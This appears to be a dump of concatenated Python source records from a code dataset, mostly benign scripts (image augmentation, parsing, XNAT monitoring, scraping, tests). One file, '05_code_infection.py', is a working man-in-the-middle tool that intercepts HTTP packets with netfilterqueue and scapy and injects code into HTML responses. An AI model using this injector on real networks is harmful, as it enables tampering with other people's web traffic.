(see 2nd image from the top for examples)\r\n # # ),\r\n iaa.Invert(0.05, per_channel=True),\r\n iaa.ContrastNormalization((0.5, 2.0), per_channel=0.5),\r\n iaa.AddToHueAndSaturation((-20, 20)), #############commonly error\r\n iaa.Add((-10, 10), per_channel=0.5),\r\n iaa.Sharpen(alpha=(0, 1.0), lightness=(0.75, 1.5)),\r\n iaa.Emboss(alpha=(0, 1.0), strength=(0, 2.0)), # emboss images\r\n iaa.Rot90(1),\r\n iaa.ElasticTransformation(alpha=(0.5, 3.5), sigma=0.25),\r\n iaa.Rot90(2),\r\n iaa.Rot90(3),\r\n ])\r\n rgb_frame = seq.augment_image(rgb_frame)\r\n return rgb_frame\r\n\r\n\r\ndef run_test_extract():\r\n model = MultiModalFeatureExtract(batch_size=2,\r\n imgfeat_extractor='vit',\r\n extract_video=True,\r\n extract_audio=False,\r\n extract_text=False)\r\n model.extract_feat(\r\n test_file=\"/Users/zhiqianhe/MyProjects/腾讯广告算法/txad/MultiModal-Tagging/src/feats_extract/imgfeat_extractor/90bf818ccdf36b3423f3c9193aa689c4.mp4\",\r\n frame_npy_path='./test.npy'\r\n )\r\n print(np.load('./test.npy'))\r\n # print(res['video'][0].shape)\r\n # print(len(res['video']))\r\n # img_file = \"/Users/zhiqianhe/MyProjects/腾讯广告算法/txad/MultiModal-Tagging/src/feats_extract/imgfeat_extractor/beautiful_girl.jpg\"\r\n # img = cv2.imread(img_file)\r\n\r\n # img = model.data_argument(img)\r\n # cv2.imshow('bg', img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n\r\n\r\nif __name__ == '__main__':\r\n run_test_extract()\r\n","sub_path":"src/feats_extract/multimodal_feature_extract.py","file_name":"multimodal_feature_extract.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"53083283","text":"\nx = int(input(\"Please input a number and I will return a list of all the divisors of that number \\n\"))\n\nprint(\"You chose \" + str(x))\n\n#if(x % 2 ==0):\n #print(\"Divisible by 2\")\n \nrangeofnumbers = range(2, x+1)\nfor y in rangeofnumbers:\n if (x % y == 0):\n print(str(y) + \" is a divisor of \" + str(x))\n else:\n print(str(y) + \" is not a divisor of \" + str(x))\n","sub_path":"codingchallenges/divisors.py","file_name":"divisors.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"341360615","text":"from zipfile import ZipFile\nimport os\n\n\ndef get_file_paths(source):\n # сканирование по каталогам и подкаталогам и\n file_paths = []\n file_paths1 = [os.path.join(root, filename) for root, direc, files in os.walk(source) for filename in files]\n\n for root, direc, files in os.walk(source):\n for filename in files:\n # объединить две строки, чтобы сформировать полный путь к файлу.\n filepath = os.path.join(root, filename)\n file_paths.append(filepath)\n # возвращает все пути к файлам\n print(f'file_paths = {type(file_paths)}')\n print(f'file_paths1 = {file_paths1}')\n return file_paths1\n\n\ndef make_reserve_arc(source, dest):\n file_name = \"archive.zip\"\n zipFile = ZipFile(file_name, 'w')\n\n file_paths = get_file_paths(source)\n\n with ZipFile('archive.zip', 'w') as myzip:\n for file in file_paths:\n myzip.write(file)\n # myzip.write(source)\n # print(myzip.namelist())\n pass\n\n\nsource = '/home/pnm/PycharmProjects/Yandex/d-19/Web1/files_zip'\ndest = ''\nmake_reserve_arc(source, dest)\n","sub_path":"Web1/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"144322007","text":"from itertools import chain\nimport io\nimport json\n\n\n# PARTIE TEXTE\ndef truncline(text, font, maxwidth):\n \"\"\"Fonction coupant le texte en deux pour tenir sur plusieurs lignes à longueur fixe\"\"\"\n real = len(text)\n stext = text\n l = font.size(text)[0]\n cut = 0\n a = 0\n done = 1\n while l > maxwidth:\n a = a + 1\n n = text.rsplit(None, a)[0]\n if stext == n:\n cut += 1\n stext = n[:-cut]\n else:\n stext = n\n l = font.size(stext)[0]\n real = len(stext)\n done = 0\n return real, done, stext\n\n\ndef wrapline(text, font, maxwidth):\n \"\"\"\n Fonction à appeler lorsqu'on veut couper un string en plusieurs lignes (sans prendre les \\n en compte)\n :param text: Texte à couper\n :param font: Police de caractère\n :param maxwidth: Taille de la ligne en pixels\n :return: Liste de lignes\n \"\"\"\n done = 0\n wrapped = []\n\n while not done:\n nl, done, stext = truncline(text, font, maxwidth)\n wrapped.append(stext.strip())\n text = text[nl:]\n return wrapped\n\n\ndef wrap_multi_line(text, font, maxwidth):\n \"\"\"\n Fonction à appeler lorsqu'on veut couper un string en plusieurs lignes (prenant en compte les \\n)\n :param text: Texte à couper\n :param font: Police de caractères\n :param maxwidth: Taille de la ligne en pixels\n :return: Liste de lignes\n \"\"\"\n lines = chain(*(wrapline(line, font, maxwidth) for line in text.splitlines()))\n return list(lines)\n\ndef get_cursor_pos(cursor, lines):\n x, y = 0, 0\n remaining = cursor\n for line in lines:\n for letter in line:\n if remaining > 0:\n x += 1\n remaining -= 1\n if remaining > 0:\n x = 0\n y += 1\n\n return x, y\n\n\n# PARTIE SAUVEGARDE DE SCENES\ndef save_scene(json, file_path):\n file_scene = io.open(\"scenes/scene_\" + file_path + \".json\", 'w', encoding='utf-8')\n file_scene.write(json)\n file_scene.close()\n\n\ndef load_scene(file_path):\n file_scene = io.open(\"scenes/scene_\" + file_path + \".json\", 'r', encoding='utf-8')\n json_scene = json.load(file_scene)\n file_scene.close()\n return json_scene\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82269072","text":"#!/home/grg/jupyter/bin/python\nfrom functools import wraps\nimport errno, os\nimport signal\nimport warnings\nimport logging as log\nwarnings.filterwarnings('ignore')\nfrom bbrc.xnat.collect import *\n\nfrom datetime import datetime\nstartTime = datetime.now() # not nice but avoids passing it everywhere\n\nclass TimeoutError(Exception):\n pass\n\ndef timeout(seconds=10, error_message=os.strerror(errno.ETIME)):\n def decorator(func):\n def _handle_timeout(signum, frame):\n raise TimeoutError(error_message)\n\n def wrapper(*args, **kwargs):\n signal.signal(signal.SIGALRM, _handle_timeout)\n signal.alarm(seconds)\n try:\n result = func(*args, **kwargs)\n finally:\n signal.alarm(0)\n return result\n\n return wraps(func)(wrapper)\n\n return decorator\n\n@timeout(10, error_message='Server not responding')\ndef connect_xnat(config_file):\n from pyxnat import Interface\n central = Interface(config=config_file, verify=True)\n projects = central.select.projects().get()\n return central, projects\n\ndef prearchive_stats(central):\n '''Lists contents of XNAT prearchive sorted by type (ready, conflicts, etc).\n `central` is a `pyxnat.Interface`.'''\n projects = central.select.projects().get()\n pa = []\n for e in central.manage.prearchive.get():\n st = central.manage.prearchive.status(e)\n if isinstance(st, list):\n for each in st:\n pa.append((e, each))\n else:\n pa.append((e, st))\n pa_by_type = {}\n for each, t in pa:\n pa_by_type.setdefault(t, []).append(each)\n return pa, pa_by_type\n\ndef sizes_projects(central):\n '''Returns a project-indexed dictionary with numbers of subjects/sessions.\n `central` is a `pyxnat.Interface`.'''\n projects = central.select.projects().get()\n sizes = {}\n for project in projects:\n s = central.select.project(project).subjects().get()\n e = central.select.project(project).experiments().get()\n sizes[project] = (len(s), len(e))\n return sizes\n\ndef count(central, output_dir, send_mail=True, debug_mode=False):\n '''Builds a Slack-ready text report on how many studies/subjects/sessions\n are stored in the given XNAT. `central` is a `pyxnat.Interface`.'''\n import operator\n import validate as vx\n\n projects = central.select.projects().get()\n # Collecting data\n\n sizes = sizes_projects(central)\n total_subjects = sum([v[0] for k, v in sizes.items()])\n total_sessions = sum([v[1] for k, v in sizes.items()])\n\n sizes = sorted(sizes.items(), key=operator.itemgetter(1), reverse=True)\n log.warning(sizes)\n\n pa, pa_by_type = prearchive_stats(central)\n\n # Building the message\n text = 'There are currently %s studies on XNAT (BSC) '\\\n '(total number of subjects: %s - total number of sessions: %s). %s sessions'\\\n ' are found in the prearchive (%s receiving, %s ready, %s building, '\\\n '%s moving, %s archiving, %s archiving pending, %s in conflict, %s with errors)'\\\n %(len(sizes), total_subjects, total_sessions, len(pa),\n len(pa_by_type.get('RECEIVING', [])), len(pa_by_type.get('READY', [])),\n len(pa_by_type.get('_BUILDING', [])), len(pa_by_type.get('_MOVING', [])),\n len(pa_by_type.get('_ARCHIVING', [])), len(pa_by_type.get('ARCHIVING', [])),\n len(pa_by_type.get('CONFLICT', [])), len(pa_by_type.get('ERROR', [])))\n attachment = ''\n for each in sizes:\n attachment = attachment + '*%s*: _%s subjects - %s sessions_\\n'\\\n %(each[0], each[1][0], each[1][1])\n\n return text, attachment\n\n\ndef notify_slack(text, attachment, webhook_url, debug_mode=False):\n\n def md5(fname):\n import hashlib\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n import json, os\n\n #===============================================================================\n # Estimates elapsed time\n seconds = datetime.now() - startTime\n m, s = divmod(seconds.total_seconds(), 60)\n h, m = divmod(m, 60)\n elapsedtime = \"%d:%02d:%02d\" % (h, m, s)\n\n #====================\n # Sends the report to Slack\n\n payload = {\"text\": \"%s Elapsed time: %s. (xnat-bsc-monitor v.%s)\"\\\n %(text, elapsedtime, md5(__file__)[:8]),\n \"attachments\": [{\n 'fallback': 'XNAT stats',\n \"text\": attachment,\n \"mrkdwn_in\": [\"text\", \"pretext\"]\n }],\n \"link_names\": 1,\n \"username\": \"xnat-monitor\",\n \"icon_emoji\": \":computer:\"\n }\n\n if not debug_mode:\n payload.update({'channel': '#xnat'})\n else:\n payload.update({'channel': '@goperto'})\n\n payload = json.dumps(payload).replace('\"', '\\\\\"').replace('\\n', '\\\\n')\n\n cmd = 'curl -H \"Content-Type: application/json\" --data \"%s\" %s'\\\n %(payload, webhook_url)\n log.info(cmd)\n\n os.system(cmd)\n","sub_path":"bbrc/xnat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379213773","text":"import sys\nimport logging\nimport spacy\nfrom graphbrain import *\nfrom graphbrain.meaning.nlpvis import print_tree\n\n\nlogging.basicConfig(stream=sys.stderr, level=logging.ERROR)\n\n\ndeps_arg_types = {\n 'nsubj': 's', # subject\n 'nsubjpass': 'p', # passive subject\n 'agent': 'a', # agent\n 'acomp': 'c', # subject complement\n 'attr': 'c', # subject complement\n 'dobj': 'o', # direct object\n 'prt': 'o', # direct object\n 'dative': 'i', # indirect object\n 'advcl': 'x', # specifier\n 'prep': 'x', # specifier\n 'parataxis': 't', # parataxis\n 'intj': 'j', # interjection\n 'xcomp': 'r', # clausal complement\n 'ccomp': 'r' # clausal complement\n}\n\n\ndef token_head_type(token):\n head = token.head\n if head and head != token:\n return token_type(head)\n else:\n return ''\n\n\ndef is_noun(token):\n return token.tag_[:2] == 'NN'\n\n\n# TODO: check if complete\ndef is_verb(token):\n tag = token.tag_\n if len(tag) > 0:\n return token.tag_[0] == 'V'\n else:\n return False\n\n\ndef is_compound(token):\n return token.dep_ == 'compound'\n\n\ndef token_type(token):\n dep = token.dep_\n head_type = token_head_type(token)\n if len(head_type) > 1:\n head_subtype = head_type[1]\n else:\n head_subtype = ''\n if len(head_type) > 0:\n head_type = head_type[0]\n\n if dep == 'ROOT':\n if token.pos_ == 'VERB': # TODO: generalize!\n return 'p'\n else:\n return 'c'\n elif dep in {'acomp', 'appos', 'attr', 'compound', 'dative', 'dep',\n 'dobj', 'nsubj', 'nsubjpass', 'oprd', 'pobj', 'meta'}:\n return 'c'\n elif dep in {'advcl', 'ccomp', 'csubj', 'csubjpass', 'parataxis'}:\n return 'p'\n elif dep == 'relcl':\n if is_verb(token):\n return 'pr'\n else:\n return 'c'\n elif dep in {'acl', 'pcomp', 'xcomp'}:\n if token.tag_ == 'IN':\n return 'a'\n else:\n return 'pc'\n elif dep in {'amod', 'det', 'npadvmod', 'nummod', 'nmod', 'preconj',\n 'predet'}:\n return 'm'\n elif dep in {'aux', 'auxpass', 'expl', 'prt', 'quantmod'}:\n if token.n_lefts + token.n_rights == 0:\n return 'a'\n else:\n return 'x'\n elif dep == 'cc':\n if head_type == 'p':\n return 'pm'\n else:\n return 'b'\n elif dep == 'case':\n if token.head.dep_ == 'poss':\n return 'bp'\n else:\n return 'b'\n elif dep == 'neg':\n return 'an'\n elif dep == 'agent':\n return 'x'\n elif dep in {'intj', 'punct'}:\n return ''\n elif dep == 'advmod':\n if token.head.dep_ == 'advcl':\n return 't'\n elif head_type == 'p':\n return 'a'\n elif head_type in {'m', 'x', 't'}:\n return 'w'\n else:\n return 'm'\n elif dep == 'poss':\n if is_noun(token):\n return 'c'\n else:\n return 'mp'\n elif dep == 'prep':\n if head_type == 'p':\n return 't'\n else:\n return 'b'\n elif dep == 'conj':\n if head_type == 'p' and is_verb(token):\n return 'p'\n else:\n return 'c'\n elif dep == 'mark':\n if head_type == 'p' and head_subtype != 'c':\n return 'x'\n else:\n return 'b'\n else:\n # error / warning\n pass\n\n\ndef is_relative_concept(token):\n return token.dep_ == 'appos'\n\n\ndef arg_type(token):\n return deps_arg_types.get(token.dep_, '?')\n\n\ndef insert_after_predicate(targ, orig):\n targ_type = entity_type(targ)\n if targ_type[0] == 'p':\n return (targ, orig)\n elif targ_type[0] == 'r':\n if targ_type == 'rm':\n inner_rel = insert_after_predicate(targ[1], orig)\n return (targ[0], inner_rel) + tuple(targ[2:])\n else:\n return insert_first_argument(targ, orig)\n else:\n # TODO: error / warning\n print('ERROR %s %s' % (targ, orig))\n return targ\n\n\ndef nest_predicate(inner, outer, before):\n if entity_type(inner) == 'rm':\n first_rel = nest_predicate(inner[1], outer, before)\n return (inner[0], first_rel) + tuple(inner[2:])\n elif is_atom(inner) or entity_type(inner)[0] == 'p':\n return outer, inner\n else:\n return ((outer, inner[0]),) + inner[1:]\n\n\ndef post_process(entity):\n if is_atom(entity):\n return entity\n else:\n entity = tuple(post_process(item) for item in entity)\n if connector_type(entity)[0] == 'c':\n return connect('+/b/.', entity)\n else:\n return entity\n\n\nclass Parser(object):\n def __init__(self, lang, pos=False):\n self.lang = lang\n self.pos = pos\n\n if lang == 'en':\n self.nlp = spacy.load('en_core_web_lg')\n elif lang == 'fr':\n self.nlp = spacy.load('fr_core_news_md')\n else:\n raise RuntimeError('unkown language: %s' % lang)\n\n def parse_token(self, token):\n extra_edges = set()\n\n positions = {}\n tokens = {}\n children = []\n entities = []\n\n child_tokens = tuple((t, True) for t in token.lefts)\n child_tokens += tuple((t, False) for t in token.rights)\n\n for child_token, pos in child_tokens:\n child, child_extra_edges = self.parse_token(child_token)\n if child:\n extra_edges |= child_extra_edges\n positions[child] = pos\n tokens[child] = child_token\n child_type = entity_type(child)\n if child_type:\n children.append(child)\n if child_type[0] in {'c', 'r', 'd', 's'}:\n entities.append(child)\n\n children.reverse()\n\n parent_type = token_type(token)\n if parent_type == '' or parent_type is None:\n return None, None\n\n # build atom\n text = token.text.lower()\n et = parent_type\n if self.pos:\n pos = '{}.{}'.format(self.lang, token.tag_.lower())\n else:\n pos = None\n\n if parent_type[0] == 'p' and parent_type != 'pm':\n if len(parent_type) == 1:\n parent_type = 'pd' # TODO: questions, imperative...\n args = [arg_type(tokens[entity]) for entity in entities]\n args_string = ''.join([arg for arg in args if arg != '?'])\n et = '{}.{}'.format(parent_type, args_string)\n\n parent_atom = build_atom(text, et, pos)\n\n parent = parent_atom\n\n relative_to_concept = []\n\n # process children\n for child in children:\n child_type = entity_type(child)\n\n logging.debug('TARGET <-: [%s] %s', parent_type, parent)\n logging.debug('<- ORIG: [%s] %s', child_type, child)\n\n if child_type[0] in {'c', 'r', 'd', 's'}:\n if parent_type[0] == 'c':\n if (connector_type(child) in {'pc', 'pr'} or\n is_relative_concept(tokens[child])):\n logging.debug('CHOICE #1')\n relative_to_concept.append(child)\n elif connector_type(child)[0] == 'b':\n if connector_type(parent)[0] == 'c':\n logging.debug('CHOICE #2')\n parent = nest(parent, child, positions[child])\n else:\n logging.debug('CHOICE #3')\n parent = apply_fun_to_atom(\n lambda target:\n nest(target, child, positions[child]),\n parent_atom, parent)\n elif connector_type(child)[0] in {'x', 't'}:\n logging.debug('CHOICE #4')\n parent = nest(parent, child, positions[child])\n else:\n if ((entity_type(parent_atom)[0] == 'c' and\n connector_type(child)[0] == 'c') or\n is_compound(tokens[child])):\n if connector_type(parent)[0] == 'c':\n if connector_type(child)[0] == 'c':\n logging.debug('CHOICE #5a')\n parent = sequence(parent, child,\n positions[child])\n else:\n logging.debug('CHOICE #5b')\n parent = sequence(parent, child,\n positions[child],\n flat=False)\n else:\n logging.debug('CHOICE #6')\n parent = apply_fun_to_atom(\n lambda target:\n sequence(target, child,\n positions[child]),\n parent_atom, parent)\n else:\n logging.debug('CHOICE #7')\n parent = apply_fun_to_atom(\n lambda target:\n connect(target, (child,)),\n parent_atom, parent)\n elif parent_type[0] in {'p', 'r', 'd', 's'}:\n logging.debug('CHOICE #8')\n parent = insert_after_predicate(parent, child)\n else:\n logging.debug('CHOICE #9')\n parent = insert_first_argument(parent, child)\n elif child_type[0] == 'b':\n if connector_type(parent) == 'c':\n logging.debug('CHOICE #10')\n parent = connect(child, parent)\n else:\n logging.debug('CHOICE #11')\n parent = nest(parent, child, positions[child])\n elif child_type[0] == 'p':\n # TODO: Pathological case\n # e.g. \"Some subspecies of mosquito might be 1s...\"\n if child_type == 'pm':\n logging.debug('CHOICE #12')\n # parent = nest(parent, child, positions[child])\n parent = (child,) + parens(parent)\n else:\n logging.debug('CHOICE #13')\n parent = connect(parent, (child,))\n elif child_type[0] == 'm':\n logging.debug('CHOICE #14')\n parent = (child, parent)\n elif child_type[0] in {'x', 't'}:\n logging.debug('CHOICE #15')\n parent = (child, parent)\n elif child_type[0] == 'a':\n logging.debug('CHOICE #16')\n parent = nest_predicate(parent, child, positions[child])\n elif child_type == 'w':\n if parent_type[0] in {'d', 's'}:\n logging.debug('CHOICE #17')\n parent = nest_predicate(parent, child, positions[child])\n # pass\n else:\n logging.debug('CHOICE #18')\n parent = nest(parent, child, positions[child])\n else:\n # TODO: warning ?\n logging.debug('CHOICE #19')\n pass\n\n parent_type = entity_type(parent)\n\n logging.debug('=== [%s] %s', parent_type, parent)\n\n if len(relative_to_concept) > 0:\n relative_to_concept.reverse()\n parent = (':/b/.', parent) + tuple(relative_to_concept)\n\n return post_process(parent), extra_edges\n\n def parse_sentence(self, sent):\n main_edge, extra_edges = self.parse_token(sent.root)\n return {'main_edge': main_edge,\n 'extra_edges': extra_edges,\n 'text': str(sent),\n 'spacy_sentence': sent}\n\n def parse(self, text):\n doc = self.nlp(text)\n return tuple(self.parse_sentence(sent) for sent in doc.sents)\n\n\nif __name__ == '__main__':\n text = \"\"\"\n Satellites from NASA and other agencies have been tracking sea ice changes\n since 1979.\n \"\"\"\n\n parser = Parser(lang='en', pos=True)\n parse = parser.parse(text)[0]\n print_tree(parse['spacy_sentence'].root)\n print(ent2str(parse['main_edge']))\n","sub_path":"graphbrain/meaning/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417530717","text":"# Copyright (C) 2020 by Landmark Acoustics LLC\nr'''Carry out the simulations and print the results.'''\n\nimport numpy as np\n\nfrom pypowerlawnoise import \\\n SpectralSlopeFinder, \\\n PowerLawNoise\n\n\ndef _print_heading(handle, headings, sep=',', le='\\n'):\n handle.write(sep.join(headings)+le)\n\n\nif __name__ == '__main__':\n\n alphas = np.linspace(-2, 2, 401)\n degrees = np.arange(65)\n fft_sizes = 2**np.arange(6, 13)\n slope_finders = {fft_size: SpectralSlopeFinder(fft_size) for fft_size in fft_sizes}\n repeats = 8\n rg = np.random.default_rng(42)\n\n with open('power_law_output.csv', 'w') as fh:\n _print_heading(fh, ['Power', 'Size', 'Degree', 'Slope'])\n for alpha in alphas:\n law = PowerLawNoise(alpha, degrees[-1])\n for K in degrees:\n for N in fft_sizes:\n ssf = slope_finders[N]\n for it in range(repeats):\n x = rg.standard_normal(N)\n n = law(x, K)\n m = ssf(n)\n fh.write(f'{alpha},{N},{K},{m}\\n')\n","sub_path":"pypowerlawnoise/pypowerlawnoise/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"478228675","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest # noqa: F401\nimport numpy as np # noqa: F401\nimport awkward as ak # noqa: F401\n\npytestmark = pytest.mark.skip(\n reason=\"Top-down JAX tests disabled; to be replaced by bottom-up.\"\n)\n\njax = pytest.importorskip(\"jax\")\njax.config.update(\"jax_platform_name\", \"cpu\")\njax.config.update(\"jax_enable_x64\", True)\n\n\ndef test_from_jax():\n jax_array_1d = jax.numpy.arange(10)\n jax_array_2d = jax.numpy.array([[1.1, 2.2], [3.3, 4.4], [5.5, 6.6], [7.7, 8.8]])\n\n ak_jax_array_1d = ak.from_jax(jax_array_1d)\n ak_jax_array_2d = ak.from_jax(jax_array_2d)\n\n for i in range(10):\n assert ak_jax_array_1d[i] == jax_array_1d[i]\n\n for i in range(4):\n for j in range(2):\n assert ak_jax_array_2d[i][j] == jax_array_2d[i][j]\n\n\ndef test_from_jax_tolist():\n jax_array_1d = jax.numpy.array([9, 8, 7, 6, 5, 4, 3, 2, 1, 0])\n\n ak_jax_array_1d = ak.from_jax(jax_array_1d)\n\n assert ak.to_list(ak_jax_array_1d.layout) == [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]\n","sub_path":"tests/test_0645-from-jax.py","file_name":"test_0645-from-jax.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"420220067","text":"#!/usr/bin/env python\nimport netfilterqueue\nimport scapy.all as scapy\nimport re\n\n\ndef set_load(packet, load):\n packet[scapy.Raw].load = load\n del packet[scapy.IP].len\n del packet[scapy.IP].chksum\n del packet[scapy.TCP].chksum\n return packet\n\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"1\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\", \"\", load)\n\n elif scapy_packet[scapy.TCP].sport == 80:\n injection_code = \"\"\n load = load.replace(\"\", injection_code + \"\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\", load)\n if content_length_search and \"text/html\" in load:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length) + len(injection_code)\n load = load.replace(content_length, str(new_content_length))\n print(\"---------\")\n print(content_length)\n print(new_content_length)\n if load != scapy_packet[scapy.Raw].load:\n new_packet = set_load(scapy_packet, load)\n packet.set_payload(str(new_packet))\n\n packet.accept()\n\ntry:\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, process_packet)\n queue.run()\n\nexcept KeyboardInterrupt:\n print(\"[+] Dectected CTRL + C ..... Runbind queue...... Please wait.\\n\")\n queue.unbind()\n","sub_path":"05_code_infection.py","file_name":"05_code_infection.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"365311780","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nimport sys,os,re\nfrom datetime import date\nfrom bs4 import BeautifulSoup\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom HTML import getDept\nfrom parsing import progress\n\n# updateDepartments(term,depts=getDept.gatherFields().dept)\n# term = YYYYTT i.e. 2017SU - string\n# depts = ditionary of department codes : department - both are strings (optional)\n# skips = $SKIPLIST - path to skip list (optional)\n# returns boolean - true for success\n# in folder courselists, there is a course list for each department for a given term\n\ndef updateDepartments(term,depts=getDept.gatherFields().dept,skips=False):\n\tif term not in getDept.gatherFields().terms:\n\t\tprint(\"Invalid Term\")\n\t\texit(1)\n\tfails = []\n\tgood = []\n\tif skips:\n\t\t#print(\"Adding courses to good\")\n\t\tskipCourses = open(skips)\n\t\tgood = skipCourses.read().split('|')\n\t\tskipCourses.close()\n\t#print (\"Initializing browser...\")\n\t# browser = webdriver.Chrome() # use ChromeDriver\n\tbrowser = webdriver.PhantomJS('phantomjs') # use PhantomJS - GhostDriver\n\tbrowser.implicitly_wait(10)\n\tdeptCount = 0\n\tdeptLen = len(depts)\n\tprint (\"Number of departments:\",deptLen)\n\tprogress.printProgressBar(deptCount, deptLen, prefix = 'Progress:', suffix = 'Complete', length = 40)\n\tfor dept in depts:\n\t\tdeptCount += 1\n\t\tprogress.printProgressBar(deptCount, deptLen, prefix = 'Progress:', suffix = 'Complete', length = 40)\n\t\t#print (\"Working on dept:\",dept+'|')\n\t\tif dept == '':\n\t\t\tcontinue\n\t\telif dept in good:\n\t\t\t#print(\"Skipping\",dept)\n\t\t\tcontinue\n\t\ttries = 0\n\t\tsuccess = False\n\t\twhile not success and tries < 2:\n\t\t\tsuccess = gatherDept(term,dept,browser)\n\t\t\ttries += 1\n\t\t\t#print(\"Try\",tries)\n\t\tif success:\n\t\t\tgood.append(dept)\n\t\telif tries == 2:\n\t\t\tfails.append(dept)\n\t\t\t#print(\"Failed to get dept\",dept+'|')\n\t\t\tcontinue\n\tfor dept in fails:\n\t\tsuccess = gatherDept(term,dept,browser)\n\t\tif success:\n\t\t\tgood.append(dept)\n\t\t\tfails.remove(dept)\n\twriteToFile(fails,'courselists/'+term+'/','fails.txt')\n\twriteToFile(good,'courselists/'+term+'/','good.txt')\n\twhile len(browser.window_handles) > 1:\n\t\tbrowser.switch_to_window(browser.window_handles[0])\n\t\tbrowser.close()\n\tprint (fails)\n\t\n# gatherDept(term, dept)\n# term = YYYYTT i.e. 2017SU - string\n# dept = department code - string\n# returns boolean - true for success\n# navegates to the page of all courses for a specified dept and term\ndef gatherDept(term,dept,browser):\n\ttry:\n\t\tnavegateSearch(browser)\n\texcept:\n\t\treturn False\n\ttry:\n\t\t##print(\"Selecting\",term)\n\t\tSelect(browser.find_element_by_id('VAR1')).select_by_value(term)\n\t\t##print(\"Selecting\",'|'+dept+'|')\n\t\tSelect(browser.find_element_by_id('LIST_VAR1_1')).select_by_value(dept)\n\t\t##print(\"Clicking submit\")\n\t\tbrowser.find_element_by_name('SUBMIT2').click()\n\texcept:\n\t\treturn False\n\treturn getCourseHTML(term,dept,browser)\n\t\n\t\n\t\n# def navegateSearch(browser)\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# opens up to the Search for Sections page on webAdvisor\ndef navegateSearch(browser):\n\t##print(\"Opening webadvisor...\")\n\tbrowser.get('https://webadvisor.ohlone.edu')\n\t##print(\"Navegating to Students...\")\n\tbrowser.find_element_by_link_text(\"Students\").click()\n\t##print(\"Navegating to Search for Sections...\")\n\tbrowser.find_element_by_link_text(\"Search for Sections\").click()\n\t\n# getCourseHTML(browser)\n# term = YYYYTT i.e. 2017SU - string\n# dept = department code - string\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# saves html for each course in that dept to a file called courselists/[TERM][DEPT].txt\ndef getCourseHTML(term,dept,browser):\n\tsoup_html = BeautifulSoup(browser.page_source,'html.parser')\n\ttry:\n\t\tend = int(re.findall(r'Page [\\w?]+ of [\\w?]+',str(soup_html))[0].split(' ')[-1])\n\texcept:\n\t\treturn False\n\tif not os.path.exists(os.path.dirname('courselists/'+term+'/')):\n\t try:\n\t os.makedirs(os.path.dirname('courselists/'+term+'/'))\n\t except:\n\t \treturn False\n\tf = open('courselists/'+term+'/'+dept+'.txt','w')\n\tf.write(dept+ \" courses for \"+term+' updated: '+str(date.today())+'\\n----------------------------------\\n\\n-------\\n')\n\thome = browser.window_handles[0]\n\tcount = 0\n\tfor page in range(end):\n\t\t#print(\"Working on page \"+str(page+1))\n\t\tfor i in range(20):\n\t\t\t#print(\"Working on course \"+str(i+1))\n\t\t\tcourseTry = 0\n\t\t\tstatus = False\n\t\t\tlastPage = False\n\t\t\twhile not status and courseTry < 3:\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_id('SEC_SHORT_TITLE_'+str(i+1)).click()\n\t\t\t\texcept:\n\t\t\t\t\tif page+1 != end:\n\t\t\t\t\t\treturn False\n\t\t\t\t\telse:\n\t\t\t\t\t\tstatus = True\n\t\t\t\t\t\tlastPage = True\n\t\t\t\t\t\tbreak\n\t\t\t\tstatus = getPage(browser,f)\n\t\t\t\tcourseTry += 1\n\t\t\t\t#if not status:\n\t\t\t\t\t#print (\"Failed to gather course... Try \",courseTry)\n\t\t\t\tbrowser.switch_to_window(home)\n\t\t\tif not status:\n\t\t\t\t#print (\"Failed to get course section...\")\n\t\t\t\treturn False\n\t\t\telif lastPage:\n\t\t\t\tbreak\n\t\t\tcount += 1\n\t\ttry:\n\t\t\tbrowser.find_element_by_xpath('//*[@id=\"GROUP_Grp_WSS_COURSE_SECTIONS\"]/table[1]/tbody/tr/td[1]/input[3]').click()\n\t\texcept:\n\t\t\treturn False\n\t#print (dept,\"Department: \",count,\"course(s).\")\n\tf.close()\n\treturn True\n\n# getPage(browser,file)\n# browser = selenium.webdriver.phantomjs.webdriver.WebDriver session\n# file = io 